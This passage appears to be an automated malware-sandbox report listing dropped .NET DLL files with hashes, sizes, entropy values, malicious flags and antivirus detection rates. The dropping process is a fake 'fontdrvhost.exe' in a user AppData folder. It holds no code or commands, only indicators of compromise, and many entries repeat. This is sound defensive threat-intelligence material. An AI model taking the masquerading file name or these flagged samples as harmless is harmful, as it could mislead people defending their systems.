                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 20%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
